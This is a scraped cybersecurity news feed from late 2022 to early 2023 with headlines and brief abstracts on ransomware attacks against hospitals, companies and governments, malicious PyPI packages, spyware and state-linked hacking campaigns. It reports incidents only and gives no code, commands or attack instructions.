Researchers unearthed an interesting technique used by threat actors wherein they use WerFault.exe, the Windows Error Reporting tool, to execute Pupy RAT on the victims’ machine. The use of ISO files and abuse of genuine Windows tools to deliver Pupy RAT indicates that the operators of this ca ... Read MoreCyware
January 7, 2023
Chick-fil-A launched an investigation into “suspicious activity” Full Text
Abstract
American fast food restaurant chain Chick-fil-A informed its customers of having launched an investigation into "suspicious activity." Chick-fil-A is an American fast food restaurant chain, it is the country's largest which specializes in chicken...Security Affairs
January 06,2023
Hackers Using CAPTCHA Bypass Tactics in Freejacking Campaign on GitHub Full Text
Abstract
A South Africa-based threat actor known as Automated Libra has been observed employing CAPTCHA bypass techniques to create GitHub accounts in a programmatic fashion as part of a freejacking campaign dubbed PURPLEURCHIN. The group "primarily targets cloud platforms offering limited-time trials of cloud resources in order to perform their crypto mining operations," Palo Alto Networks Unit 42 researchers William Gamazo and Nathaniel Quist said . PURPLEURCHIN first came to light in October 2022 when Sysdig disclosed that the adversary created as many as 30 GitHub accounts, 2,000 Heroku accounts, and 900 Buddy accounts to scale its operation. Now according to Unit 42, the cloud threat actor group created three to five GitHub accounts every minute at the height of its activity in November 2022, totally setting up over 130,000 bogus accounts across Heroku, Togglebox, and GitHub. More than 22,000 GitHub accounts are estimated to have been created between September and NovembThe Hacker News
January 6, 2023
Saint Gheorghe Recovery Hospital in Romania suffered a ransomware attack Full Text
Abstract
The Saint Gheorghe Recovery Hospital in Romania suffered a ransomware attack in December that is still impacting medical activity. The Saint Gheorghe Recovery Hospital in Botoşani, in northeastern Romania, was hit by a ransomware attack in December...Security Affairs
January 6, 2023
Rackspace: Play Ransomware gang used a previously unknown exploit to access its Hosted Exchange email environment Full Text
Abstract
Cloud services provider Rackspace confirmed that the recent data breach was the result of the Play Ransomware gang's attack. Cloud services provider Rackspace announced this week that the recent data breach was the result of an attack conducted by the Play ransomware...Security Affairs
January 6, 2023
Software provider denied insurance payout after ransomware attack Full Text
Abstract
The Supreme Court of Ohio issued a ruling that EMOI Services shouldn't be covered by insurance against a ransomware attack as it didn't cause direct or physical harm to tangible components of software, as it doesn’t have any.Cyware
January 6, 2023
PurpleUrchin Campaign Bypasses CAPTCHA and Steals Cloud Platform Resources for Cryptomining Full Text
Abstract
Automated Libra is a South African-based freejacking group that primarily targets cloud platforms offering limited-time trials of cloud resources in order to perform their cryptomining operations.Cyware
January 05,2023
CircleCI Urges Customers to Rotate Secrets Following Security Incident Full Text
Abstract
DevOps platform CircleCI on Wednesday urged its customers to rotate all their secrets following an unspecified security incident. The company said an investigation is currently ongoing, but emphasized that "there are no unauthorized actors active in our systems." Additional details are expected to be shared in the coming days. "Immediately rotate any and all secrets stored in CircleCI," CircleCI's chief technology officer, Rob Zuber, said in a terse advisory. "These may be stored in project environment variables or in contexts." CircleCI is also recommending users to review internal logs for signs of any unauthorized access starting from December 21, 2022, to January 4, 2023, or until when the secrets are rotated. The software development service did not disclose any further specifics about the breach, but said it has also invalidated all Project API tokens and that they need to be replaced. The disclosure comes weeks after the company annoThe Hacker News
January 4, 2023
US. rail and locomotive company Wabtec hit with Lockbit ransomware Full Text
Abstract
US. rail and locomotive company Wabtec Corporation disclosed a data breach after it was hit with Lockbit ransomware attack. Wabtec Corporation is an American company formed by the merger of the Westinghouse Air Brake Company (WABCO)...Security Affairs
January 2, 2023
Barbados: QEH progress report on cyberattack Full Text
Abstract
The out-patients clinic remains open to the public. However, there may be delays and changes to their visit given the current situation. The cybersecurity incident has prevented the department from issuing appointment dates at this time.Cyware
January 2, 2023
Possible Cyberattack at CentraState Prompts Hospital to Divert Ambulances Full Text
Abstract
Spokeswoman Lori Palmer said critical care at the hospital has not been affected and the hospital is still taking some walk-in patients. Additionally, outpatient services were to be suspended at 1 PM Friday and remain that way until further notice.Cyware
January 2, 2023
Bristol Community College’s Computer Systems Hacked in Ransomware Attack Full Text
Abstract
The college, which has a campus in Attleboro, said in a statement posted Friday on its website its computer network was hacked by a “criminal cyberattack” and “this incident involved ransomware encryption.”Cyware
January 2, 2023
Pro-Russia cyberattacks aim at destabilizing Poland, security agency warns Full Text
Abstract
Poland security agency warns pro-Russian hackers that are continuously targeting the state since the start of the invasion of Ukraine. Since the beginning of the invasion of Ukraine, Poland has been a constant target of cyber attacks conducted by pro-Russian...Security Affairs
December 30, 2022
Royal ransomware Group Claims Attacking Iowa PBS station Full Text
Abstract
Two days after Iowa PBS became aware of the incident, several local news outlets reported it cut short its annual fall fundraising pledge drive due to a cyberattack. The Royal ransomware group took credit for the attack.Cyware
December 30, 2022
Lockbit ransomware gang claims to have hacked the Port of Lisbon Full Text
Abstract
The website for the Port of Lisbon is still down days after it was the target of a ransomware attack claimed by Lockbit group. The Port of Lisbon is the third-largest port in Portugal and one of the main European ports due to its strategic location. The...Security Affairs
December 30, 2022
Toy Maker Jakks Pacific Reports Cyberattack Full Text
Abstract
The firm – which is one of the biggest toy companies in the world thanks to licensing deals with Disney and Nintendo – hired cybersecurity experts to deal with the incident and restore their servers.Cyware
December 29, 2022
EarSpy Attack Eavesdrops Using Motion Sensors Full Text
Abstract
Academic researchers from five American universities discovered a new attack method called EarSpy that can be used to eavesdrop on Android phones via motion sensors. According to experts, one way to reduce the efficacy of the EarSpy attack is to set the volume lower for the ear speakers.Cyware
December 29, 2022
LCMHS hospital suffered a Ransomware attack at Louisiana hospital that impacted 270,000 patients Full Text
Abstract
The Lake Charles Memorial Health System (LCMHS) suffered a ransomware attack that impacted 270,000 patients. The Lake Charles Memorial Health System (LCMHS) disclosed a data breach that affected almost 270,000 patients at its medical centers. The Lake...Security Affairs
December 29, 2022
Lake Charles Memorial Hospital Suffered a Ransomware Attack Full Text
Abstract
Hive group laid bare the files that were allegedly stolen after breaking into LCMHS systems. Bills of materials, cards, contracts, medical information, papers, medical records, scans, residents, and other documents are among the files listed.Cyware
December 28, 2022
Royal ransomware claims attack on Intrado telecom provider Full Text
Abstract
The Royal Ransomware gang claimed responsibility for a cyber attack against telecommunications company Intrado on Tuesday.BleepingComputer
December 28, 2022
Ransomware attack at Louisiana hospital impacts 270,000 patients Full Text
Abstract
The Lake Charles Memorial Health System (LCMHS) is sending out notices of a data breach affecting almost 270,000 people who have received care at one of its medical centers.BleepingComputer
December 28, 2022
Defrost Finance Breaks Silence on ‘Exit Scam’ Accusations, Denies Rug Pull Full Text
Abstract
On Dec. 23, the platform announced it suffered a flash loan attack, leading to the draining of user funds from its v2 protocol. One day later, another incident saw a hacker steal the admin key for a second “much larger” attack on the v1 protocol.Cyware
December 27, 2022
EarSpy attack eavesdrops on Android phones via motion sensors Full Text
Abstract
A team of researchers has developed an eavesdropping attack for Android devices that can, to various degrees, recognize the caller's gender and identity, and even discern private speech.BleepingComputer
December 26, 2022
Labour Attacks Delays to Online Safety Bill as it Highlights Christmas Scams Full Text
Abstract
The bill has been hit by repeated delays and amendments. It has since been held up while ministers re-wrote parts of it, given a row among Conservative MPs that it would unfairly stifle freedom of speech online.Cyware
December 23, 2022
New STEPPY#KAVACH Attack Campaign Likely Targeting Indian Government Full Text
Abstract
The new malicious campaign from STEPPY#KAVACH observed over the past few weeks appears to share many common TTPs with the SideCopy/APT36 threat actors that were extremely active in 2021 and were previously attributed to Pakistan by some researchers.Cyware
December 23, 2022
An Iranian group hacked Israeli CCTV cameras, defense was aware but didn’t block it Full Text
Abstract
An Iranian group hacked dozens of CCTV cameras in Israel in 2021 and maintained access for a long period of time. An Iranian group of hackers, known as Moses Staff, had seized control of dozens of Israeli CCTV cameras, the hack was known to the authorities...Security Affairs
December 22, 2022
Stolen certificates in two waves of ransomware and wiper attacks Full Text
Abstract
The threat actors used certificates from Nvidia and Kuwait Telecommunications Company to sign their malware; the former was already leaked, but we’re not sure how they got their hands on the latter.Cyware
December 22, 2022
Comcast Xfinity accounts hacked in widespread 2FA bypass attacks Full Text
Abstract
Comcast Xfinity customers report their accounts being hacked in widespread attacks that bypass two-factor authentication. These compromised accounts are then used to reset passwords for other services, such as the Coinbase and Gemini crypto exchanges.BleepingComputer
December 21, 2022
Russians hacked JFK airport’s taxi dispatch system for profit Full Text
Abstract
Two U.S. citizens were arrested for allegedly conspiring with Russian hackers to hack the John F. Kennedy International Airport (JFK) taxi dispatch system to move specific taxis to the front of the queue in exchange for a $10 fee.BleepingComputer
December 21, 2022
German industrial giant ThyssenKrupp targeted in a new cyberattack Full Text
Abstract
German multinational industrial engineering and steel production company ThyssenKrupp AG was the target of a cyberattack. German multinational industrial engineering and steel production giant ThyssenKrupp AG announced that the Materials Services...Security Affairs
December 21, 2022
German Steel Production Giant ThyssenKrupp Targeted in a New Cyberattack Full Text
Abstract
At the time of reporting, the company is yet to disclose the type of attack that hit its systems and no cybercriminal group has yet claimed responsibility for the attack.Cyware
December 20, 2022
Hackers bombard PyPi platform with information-stealing malware Full Text
Abstract
The PyPi python package repository is being bombarded by a wave of information-stealing malware hiding inside malicious packages uploaded to the platform to steal software developers' data.BleepingComputer
December 20, 2022
Attack Campaign Spreads Raspberry Robin Malware Across Europe, South America, and Oceania Full Text
Abstract
The group behind Raspberry Robin appears to be testing the waters to see how far its deployments can spread. Majority of the group’s victims are either government agencies or telecommunication entities from South America, Europe, and Oceania.Cyware
December 19, 2022
Play ransomware claims attack on German hotel chain H-Hotels Full Text
Abstract
The Play ransomware gang has claimed responsibility for a cyber attack on H-Hotels (h-hotels.com) that has resulted in communication outages for the company.BleepingComputer
December 19, 2022
Ukraine’s DELTA military system users targeted by info-stealing malware Full Text
Abstract
A compromised Ukrainian Ministry of Defense email account was found sending phishing emails and instant messages to users of the 'DELTA' situational awareness program to infect systems with information-stealing malware.BleepingComputer
December 19, 2022
Qakbot Attackers Manipulates SVG Files in HTML Smuggling Attack Full Text
Abstract
Phishing campaigns involving QBot malware as payload have started using a new technique. Hackers are using SVG files to perform HTML smuggling that locally creates a malicious installer for Windows systems. This particular activity allows them to stay under the radar and bypass security tools that ... Read MoreCyware
December 18, 2022
Fire and rescue service in Victoria, Australia, confirms cyber attack Full Text
Abstract
The fire and rescue service in the state of Victoria, Australia, has shut down its network and turned to operating manually after a cyberattack. The fire and rescue service in the state of Victoria (FRV), Australia, has shut down its network after...Security Affairs
December 16, 2022
Colombian energy supplier EPM hit by BlackCat ransomware attack Full Text
Abstract
Colombian energy company Empresas Públicas de Medellín (EPM) suffered a BlackCat/ALPHV ransomware attack on Monday, disrupting the company's operations and taking down online services.BleepingComputer
December 14, 2022
‘Crisis Situation’ Declared as Two Swedish Municipalities Hit by Cyberattack Full Text
Abstract
An intrusion has been confirmed into the joint IT system used by the two municipalities of Borgholm and Mörbylånga, which together make up the island of Öland with a total population of just over 25,000.Cyware
December 13, 2022
LockBit claims attack on California’s Department of Finance Full Text
Abstract
The Department of Finance in California has been the target of a cyberattack now claimed by the LockBit ransomware gang.BleepingComputer
December 13, 2022
Ukrainian Railway, Government Agencies Allegedly Targeted by DolphinCape Malware Full Text
Abstract
The attacks involved an email campaign in which hackers sent out messages purportedly on behalf of Ukraine’s State Emergency Service with tips on how to identify a kamikaze drone.Cyware
December 12, 2022
Play ransomware claims attack on Belgium city of Antwerp Full Text
Abstract
The Play ransomware operation has claimed responsibility for a recent cyberattack on the Belgium city of Antwerp.BleepingComputer
December 12, 2022
Knox College president addresses ransomware incident as notorious group claims credit Full Text
Abstract
The Hive ransomware group claimed to have encrypted “critical infrastructure and data,” compromised the college’s backup servers, and mined sensitive personal information like medical records and social security numbers.Cyware
December 12, 2022
TrueBot infections were observed in Clop ransomware attacks Full Text
Abstract
Researchers reported an increase in TrueBot infections, attackers have shifted from using malicious emails as their primary delivery method to other techniques. Cisco Talos researchers reported an increase in TrueBot infections, threat actors...Security Affairs
December 9, 2022
Supply Chain Attack via New Malicious Python Package, “shaderz” Full Text
Abstract
This Python package was published on December 2, 2022, as shown in its official PyPI repository. The package includes malicious code in its setup.py installation script that downloads and runs an executable file as a part of its installation.Cyware
December 8, 2022
French Sporting Goods Retailer Intersport Hit by Hive Ransomware Group Full Text
Abstract
The breach allegedly happened in November, with details made available only on the dark web. Passports, paystubs, and other details on Intersport customers are included in a sample file that media outlet Numerama claims Hive leaked on the dark web.Cyware
December 8, 2022
Cincinnati restaurants under attack by cyber hackers Full Text
Abstract
Multiple restaurants in Cincinnati, Ohio, are fighting cyber hackers who have stolen thousands of dollars, damaged their reputations, and shut down their social media pages.Cyware
December 07, 2022
CloudSEK claims it was hacked by another cybersecurity firm Full Text
Abstract
Indian cybersecurity firm CloudSEK says a threat actor gained access to its Confluence server using stolen credentials for one of its employees' Jira accounts.BleepingComputer
December 7, 2022
South Pacific vacations may be wrecked by ransomware Full Text
Abstract
New Zealand's Privacy Commission has signaled it may open an investigation into local managed services provider Mercury IT, which serves many government agencies and businesses and has been hit by ransomware.Cyware
December 05, 2022
Ransomware attack forces French hospital to transfer patients Full Text
Abstract
The André-Mignot teaching hospital in the suburbs of Paris had to shut down its phone and computer systems because of a ransomware attack that hit on Saturday evening.BleepingComputer
December 5, 2022
‘Cybersecurity incident’ hits San Diego Unified computer network Full Text
Abstract
District Superintendent Lamont Jackson on Thursday sent a letter to his staff and families of students attending SDUSD campuses to apprise them of what he described as a "cybersecurity incident."Cyware
December 5, 2022
India: Safdarjung Hospital reports cyberattack but not ransomware; AIIMS server down for 11th day Full Text
Abstract
According to the officials, the Safdarjung hospital runs OPD services manually therefore it had not been severe. Meanwhile, the AIIMS server remained down for the 11th day today.Cyware
December 2, 2022
New Zealand health insurer Accuro says it’s been hacked, can’t rule out customers’ data being accessed Full Text
Abstract
Accuro, a New Zealand health insurer, says a cybersecurity incident has compromised its ability to access systems but it's not yet known whether customer data is exposed.Newshub
November 30, 2022
IKEA Investigating Cyberattacks on Outlets in Kuwait, Morocco Full Text
Abstract
Swedish furniture giant IKEA confirmed that its franchises in Kuwait and Morocco are dealing with a cyberattack that caused a disturbance on some operating systems. They were added to the leak site of the Vice Society ransomware group on Monday.The Record
November 30, 2022
Keralty ransomware attack impacts Colombia’s health care system Full Text
Abstract
The Keralty multinational healthcare organization suffered a RansomHouse ransomware attack on Sunday, disrupting the websites and operations of the company and its subsidiaries.BleepingComputer
November 30, 2022
Attackers abused the popular TikTok Invisible Challenge to spread info-stealer Full Text
Abstract
Threat actors are exploiting interest in a popular TikTok challenge, dubbed Invisible Challenge, to trick users into downloading info-stealing malware. Threat actors are exploiting the popularity of a TikTok challenge, called Invisible Challenge,...Security Affairs
November 28, 2022
RansomBoggs Attacks in Ukraine Linked To Russian Hackers Full Text
Abstract
ESET researchers connected the Russian Sandworm APT group to a new ransomware, dubbed RansomBoggs, that has been targeting Ukrainian entities. Sandworm’s linkage with the new RansomBoggs indicates that the group is actively enhancing its toolset to make its attacks efficient.Cyware Alerts - Hacker News
November 25, 2022
New ransomware attacks in Ukraine linked to Russian Sandworm hackers Full Text
Abstract
New ransomware attacks targeting organizations in Ukraine first detected this Monday have been linked to the notorious Russian military threat group known as Sandworm.BleepingComputer
November 25, 2022
Vice Society ransomware claims attack on Cincinnati State college Full Text
Abstract
The Vice Society ransomware operation has claimed responsibility for a cyberattack on Cincinnati State Technical and Community College, with the threat actors now leaking data allegedly stolen during the attack.BleepingComputer
November 24, 2022
An aggressive malware campaign targets US-based companies with Qakbot to deliver Black Basta Ransomware Full Text
Abstract
Researchers warn of an ongoing aggressive Qakbot malware campaign that leads to Black Basta ransomware infections in the US. Experts at the Cybereason Global SOC (GSOC) team have observed a surge in Qakbot infections as part of an ongoing aggressive...Security Affairs
November 23, 2022
Russian hackers Killnet launch multiple attacks on UK websites Full Text
Abstract
A Russian hacking outfit has claimed to have taken down the website of the Prince of Wales over the UK's continued support for Ukraine. Killnet said it had launched the attack "due to the supply of high-precision missiles to Ukraine".Express
November 18, 2022
Ongoing supply chain attack targets Python developers with WASP Stealer Full Text
Abstract
A threat actor tracked as WASP is behind an ongoing supply chain attack targeting Python developers with the WASP Stealer. Checkmarx researchers uncovered an ongoing supply chain attack conducted by a threat actor they tracked as WASP that is targeting...Security Affairs
November 17, 2022
Two public schools in Michigan hit by a ransomware attack Full Text
Abstract
Public schools in two Michigan counties were forced to halt their activities, including the lessons, after a ransomware attack. Public schools in Jackson and Hillsdale counties, Michigan, reopen after a closure of two days caused by a ransomware...Security Affairs
November 17, 2022
Magento and Adobe Commerce websites under attack Full Text
Abstract
Researchers warn of a surge in cyberattacks targeting CVE-2022-24086, a pre-authentication issue impacting Adobe Commerce and Magento stores. In September 2022, Sansec researchers warned of a surge in hacking attempts targeting a critical Magento...Security Affairs
November 16, 2022
New RapperBot Campaign targets game servers with DDoS attacks Full Text
Abstract
Fortinet researchers discovered new samples of RapperBot used to build a botnet to launch Distributed DDoS attacks against game servers. Fortinet FortiGuard Labs researchers have discovered new samples of the RapperBot malware that are being used...Security Affairs
November 16, 2022
Magento stores targeted in massive surge of TrojanOrders attacks Full Text
Abstract
At least seven hacking groups are behind a massive surge in 'TrojanOrders' attacks targeting Magento 2 websites, exploiting a vulnerability that allows the threat actors to compromise vulnerable servers.BleepingComputer
November 14, 2022
Bahrain Government Websites Attacked Right Before Parliamentary Election Full Text
Abstract
The Interior Ministry did not identify the websites targeted, but the country's state-run Bahrain News Agency could not be reached online nor could the website for Bahrain's parliament.ABC News
November 12, 2022
StrelaStealer and IceXLoader Drive Info-Stealing Campaigns | Cyware Hacker News Full Text
Abstract
Researchers have discovered new waves of malware campaigns, with two information-stealing malware, StrelaStealer and IceXLoader, infecting victims with malicious email attachments. StrelaStealer searches for credentials stored in the Thunderbird and Outlook email clients to steal them. IceXLoader i ... Read MoreCyware Alerts - Hacker News
November 12, 2022
Canadian supermarket chain giant Sobeys suffered a ransomware attack Full Text
Abstract
Sobeys, the second-largest supermarket chain in Canada, was he victim of a ransomware attack conducted by the Black Basta gang. Sobeys Inc. is the second largest supermarket chain in Canada, the company operates over 1,500 stores operating across...Security Affairs
November 11, 2022
Experts Uncover Two Long-Running Android Spyware Campaigns Targeting Uyghurs Full Text
Abstract
Two long-running surveillance campaigns have been found targeting the Uyghur community in China and elsewhere with Android spyware tools designed to harvest sensitive information and track their whereabouts. This encompasses a previously undocumented malware strain called BadBazaar and updated variants of an espionage artifact dubbed MOONSHINE by researchers from the University of Toronto's Citizen Lab in September 2019. "Mobile surveillance tools like BadBazaar and MOONSHINE can be used to track many of the 'pre-criminal' activities, actions considered indicative of religious extremism or separatism by the authorities in Xinjiang," Lookout said in a detailed write-up of the operations. The BadBazaar campaign, according to the security firm, is said to date as far back as late 2018 and comprise 111 unique apps that masquerade as benign video players, messengers, religious apps, and even TikTok. While these samples were distributed through Uyghur-languageThe Hacker News
November 11, 2022
An initial access broker claims to have hacked Deutsche Bank Full Text
Abstract
An initial access broker claims to have hacked Deutsche Bank and is offering access to its systems for sale on Telegram. A threat actor (0x_dump) claims to have hacked the multinational investment bank Deutsche Bank and is offering access to its network...Security Affairs
November 11, 2022
Canadian food retail giant Sobeys hit by Black Basta ransomware Full Text
Abstract
Grocery stores and pharmacies belonging to Canadian food retail giant Sobeys have been experiencing IT systems issues since last weekend.BleepingComputer
November 11, 2022
Microsoft Blames Russian Hackers for Prestige Ransomware Attacks on Ukraine and Poland Full Text
Abstract
Microsoft on Thursday attributed the recent spate of ransomware incidents targeting transportation and logistics sectors in Ukraine and Poland to a threat cluster that shares overlaps with the Russian state-sponsored Sandworm group . The attacks, which were disclosed by the tech giant last month, involved a strain of previously undocumented malware called Prestige and is said to have taken place within an hour of each other across all victims. The Microsoft Threat Intelligence Center (MSTIC) is now tracking the threat actor under its element-themed moniker Iridium (née DEV-0960), citing overlaps with Sandworm (aka Iron Viking, TeleBots, and Voodoo Bear). "This attribution assessment is based on forensic artifacts, as well as overlaps in victimology, tradecraft, capabilities, and infrastructure, with known Iridium activity," MSTIC said in an update. The company also further assessed the group to have orchestrated compromise activity targeting many of the Prestige vicThe Hacker News
November 10, 2022
Warning: New Massive Malicious Campaigns Targeting Top Indian Banks’ Customers Full Text
Abstract
Cybersecurity researchers are warning of "massive phishing campaigns" that distribute five different malware targeting banking users in India. "The bank customers targeted include account subscribers of seven banks, including some of the most well-known banks located in the country and potentially affecting millions of customers," Trend Micro said in a report published this week. Some of the targeted banks include Axis Bank, ICICI Bank, and the State Bank of India (SBI), among others. The infection chains all have a common entry point in that they rely on SMS messages containing a phishing link that urge potential victims to enter their personal details and credit card information to supposedly get a tax refund or gain credit card reward points. The smishing attacks, which deliver Elibomi, FakeReward, AxBanker, IcRAT, and IcSpy, are just the latest in a series of similar rewards-themed malware campaigns that have been documented by Microsoft, Cyble , and KThe Hacker News
November 09, 2022
Several Cyber Attacks Observed Leveraging IPFS Decentralized Network Full Text
Abstract
A number of phishing campaigns are leveraging the decentralized Interplanetary Filesystem (IPFS) network to host malware, phishing kit infrastructure, and facilitate other attacks. "Multiple malware families are currently being hosted within IPFS and retrieved during the initial stages of malware attacks," Cisco Talos researcher Edmund Brumaghin said in an analysis shared with The Hacker News. The research mirrors similar findings from Trustwave SpiderLabs in July 2022, which found more than 3,000 emails containing IPFS phishing URLs as an attack vector, calling IPFS the new "hotbed" for hosting phishing sites. IPFS as a technology is both resilient to censorship and takedowns, making it a double-edged sword. Underlying it is a peer-to-peer (P2P) network which replicates content across all participating nodes so that even if content is removed from one machine, requests for the resources can still be served via other systems. This also makes it ripe for abuThe Hacker News
November 09, 2022
15,000 sites hacked for massive Google SEO poisoning campaign Full Text
Abstract
Hackers are conducting a massive black hat search engine optimization (SEO) campaign by compromising almost 15,000 websites to redirect visitors to fake Q&A discussion forums.BleepingComputer
November 8, 2022
Medibank confirms ransomware attack impacting 9.7M customers, but doesn’t pay the ransom Full Text
Abstract
Australian health insurer Medibank confirmed that personal data belonging to around 9.7 million current and former customers were exposed as a result of a ransomware attack. Medibank announced that personal data belonging to around 9.7M of current...Security Affairs
November 7, 2022
Australia: LockBit ransomware gang hits Melbourne school Kilvington Grammar Full Text
Abstract
Data exfiltrated from independent co-educational Baptist institution Kilvington Grammar School by the LockBit ransomware gang has been posted on the dark web on October 14. LockBit only attacks Windows systems.IT Wire
November 3, 2022
250+ U.S. news sites spotted spreading FakeUpdates malware in a supply-chain attack Full Text
Abstract
Threat actors compromised a media company to deliver FakeUpdates malware through the websites of hundreds of newspapers in the US. Researchers at Proofpoint Threat Research observed threat actor TA569 intermittently injecting malicious code on a media...Security Affairs
November 03, 2022
LockBit ransomware claims attack on Continental automotive giant Full Text
Abstract
The LockBit ransomware gang has claimed responsibility for a cyberattack against the German multinational automotive group Continental.BleepingComputer
November 3, 2022
Black Basta Ransomware Attacks Deploy Custom EDR Evasion Tools Tied to FIN7 Threat Actor Full Text
Abstract
SentinelLabs experts analyzed tools used by the ransomware gang in attacks, including some custom tools used for EDR evasion. SentinelLabs believes the developer of these tools is, or was, a developer for the FIN7 gang.Sentinel One
November 02, 2022
Hundreds of U.S. news sites push malware in supply-chain attack Full Text
Abstract
The compromised infrastructure of an undisclosed media company is being used by threat actors to deploy the SocGholish JavaScript malware framework (also known as FakeUpdates) on the websites of hundreds of newspapers across the U.S.BleepingComputer
October 31, 2022
Ransomware Attack on Australian Defense Contractor May Expose Private Communications Between ADF Members Full Text
Abstract
A ransomware attack may have resulted in data related to private communications between current and former Australian defense force members being compromised, with as many as 40,000 records at risk.The Guardian
October 31, 2022
Snatch group claims to have hacked military provider HENSOLDT France Full Text
Abstract
The Snatch ransomware group claims to have hacked HENSOLDT France, a company specializing in military and defense electronics. The Snatch ransomware group claims to have hacked the French company HENSOLDT France. HENSOLDT is a company specializing...Security Affairs
October 31, 2022
Indianapolis Low-Income Housing Agency Hit by Ransomware Attack Full Text
Abstract
The attack delayed the Indianapolis Housing Agency’s ability to send out October rent payments to landlords for the federal housing choice voucher program, also known as Section 8, which 8,000 Indianapolis families depend on.Security Week
October 31, 2022
DEV-0950 Uses Raspberry Robin Worm in Cl0p Ransomware Attacks Full Text
Abstract
The Raspberry Robin malware, which was initially spread via external USB drives, is now using additional infection methods and working with other malware families in its recent cyberattacks.Cyware Alerts - Hacker News
October 30, 2022
BlackByte ransomware group hit Asahi Group Holdings, a precision metal manufacturing and metal solution provider Full Text
Abstract
The BlackByte ransomware group claims to have compromised Asahi Group Holdings, a precision metal manufacturing and metal solution provider. Asahi Group Holdings, Ltd. is a precision metal manufacturing and metal solution provider, for more than...Security Affairs
October 30, 2022
Air New Zealand warns of an ongoing credential stuffing attack Full Text
Abstract
Air New Zealand suffered a security breach, multiple customers have been locked out of their accounts after the incident. Air New Zealand suffered a security breach, threat actors attempted to access customers' accounts by carrying out credential-stuffing...Security Affairs
October 29, 2022
A massive cyberattack hit Slovak and Polish Parliaments Full Text
Abstract
The Slovak and Polish parliaments were hit by a massive cyber attack, and the voting system in Slovakia's legislature was brought down. A massive cyber attack hit the Slovak and Polish parliaments, reported the authorities. The cyber attack brought...Security Affairs
October 28, 2022
IT Systems at Polish, Slovak Parliaments Hit by Cyberattacks Full Text
Abstract
"The attack was multi-directional, including from inside the Russian Federation," the Polish Senate said in a statement. The Slovak parliament's deputy speaker Gabor Grendel told AFP: that "Parliament's entire computer network has been paralysed".Security Week
October 27, 2022
Australian Clinical Labs Suffers Major Hack Affecting 223,000 Accounts Full Text
Abstract
Medlab became aware of unauthorized third-party access to its IT system in February and a month later, was informed by the Australian Cyber Security Centre (ACSC) that it may have been the victim of a ransomware incident.Yahoo Finance
October 27, 2022
Twilio discloses another hack from June, blames voice phishing Full Text
Abstract
Cloud communications company Twilio disclosed a new data breach stemming from a June 2022 security incident where the same attackers behind the August hack accessed some customers' information.BleepingComputer
October 27, 2022
New York Post hacked with offensive headlines targeting politicians Full Text
Abstract
New York Post confirmed today that it was hacked after its website and Twitter account were used by the attackers to publish offensive headlines and tweets targeting U.S. politicians.BleepingComputer
October 25, 2022
Emotet Launches Attacks with One-Click Attack Technique Full Text
Abstract
Trustwave SpiderLabs noted a spike in malspam campaigns by the Emotet botnet. In this attack wave, attackers are reportedly using invoice-themes phishing lures with password-protected archive files. These files drop CoinMiner and Quasar RAT to take over compromised systems.Cyware Alerts - Hacker News
October 25, 2022
Hackers hit cybersecurity conference in Australia Full Text
Abstract
The Australian Institute of Company Directors (AIDC) had some solid names lending support to the launch of the institute’s new set of “cybersecurity governance principles” but the event did not start on time due to the hacking incident.Sydney Morning Herald
October 24, 2022
Pendragon car dealer refuses $60 million LockBit ransomware demand Full Text
Abstract
Pendragon Group, with more than 200 car dealerships in the U.K., was breached in a cyberattack from the LockBit ransomware gang, who allegedly demanded $60 million to decrypt files and not leak them.BleepingComputer
October 23, 2022
Wholesale giant METRO confirmed to have suffered a cyberattack Full Text
Abstract
International cash and carry giant METRO suffered this week IT infrastructure outages following a cyberattack. International cash and carry giant METRO was hit by a cyberattack that caused IT infrastructure outages. Metro employs more than 95,000...Security Affairs
October 20, 2022
OldGremlin hackers use Linux ransomware to attack Russian orgs Full Text
Abstract
OldGremlin, one of the few ransomware groups attacking Russian corporate networks, has expanded its toolkit with file-encrypting malware for Linux machines.BleepingComputer
October 19, 2022
Chinese Hackers Targeting Online Casinos with GamePlayerFramework Malware Full Text
Abstract
An advanced persistent threat (APT) group of Chinese origin codenamed DiceyF has been linked to a string of attacks aimed at online casinos in Southeast Asia for years. Russian cybersecurity company Kaspersky said the activity aligns with another set of intrusions attributed to Earth Berberoka (aka GamblingPuppet ) and DRBControl , citing tactical and targeting similarities as well as the abuse of secure messaging clients. "Possibly we have a mix of espionage and [intellectual property] theft, but the true motivations remain a mystery," researchers Kurt Baumgartner and Georgy Kucherin said in a technical write-up published this week. The starting point of the investigation was in November 2021 when Kaspersky said it detected multiple PlugX loaders and other payloads that were deployed via an employee monitoring service and a security package deployment service. The initial infection method – the distribution of the framework through security solution packagesThe Hacker News
October 19, 2022
Hackers use new stealthy PowerShell backdoor to target 60+ victims Full Text
Abstract
A previously undocumented, fully undetectable PowerShell backdoor is being actively used by a threat actor who has targeted at least 69 entities.BleepingComputer
October 17, 2022
Japanese tech firm Oomiya hit by LockBit 3.0. Multiple supply chains potentially impacted Full Text
Abstract
The IT infrastructure of the Japanese tech company Oomiya was infected with the LockBit 3.0 ransomware. One of the affiliates for the LockBit 3.0 RaaS hit the Japanese tech company Oomiya. Oomiya is focused on designing and manufacturing microelectronics and...Security Affairs
October 17, 2022
Australian insurance firm Medibank confirms ransomware attack Full Text
Abstract
Health insurance provider Medibank has confirmed that a ransomware attack is responsible for last week's cyberattack and disruption of online services.BleepingComputer
October 17, 2022
Bulgaria hit by a cyber attack originating from Russia Full Text
Abstract
Government institutions in Bulgaria have been hit by a cyber attack during the weekend, experts believe it was launched by Russian threat actors. The infrastructure of government institutions in Bulgaria has been hit by a massive DDoS attack. The attack...Security Affairs
October 17, 2022
Ransomware Actors Target a Major Indian Pharma Company Full Text
Abstract
Leaked data from Aarti Drugs includes business and administration data, including loan documents, and tax filing information. Whereas, stolen data from Ipca Laboratories includes employee records, formulation data, and financial and audit reports.The Times Of India
October 17, 2022
Japanese Tech firm Oomiya Hit by LockBit 3.0; Supply Chains Impacted Full Text
Abstract
Lockbit 3.0 operators claim to have stolen data from the company and threaten to leak it by October 20, 2022 if the company will not pay the ransom. At this time, the ransomware gang has yet to publish samples of the alleged stolen documents.Security Affairs
October 16, 2022
Threat actors hacked hundreds of servers by exploiting Zimbra CVE-2022-41352 bug Full Text
Abstract
Threat actors have compromised hundreds of servers exploiting critical flaw CVE-2022-41352 in Zimbra Collaboration Suite (ZCS). Last week, researchers from Rapid7 warned of the exploitation of unpatched zero-day remote code execution vulnerability,...Security Affairs
October 15, 2022
Indian Energy Company Tata Power’s IT Infrastructure Hit By Cyber Attack Full Text
Abstract
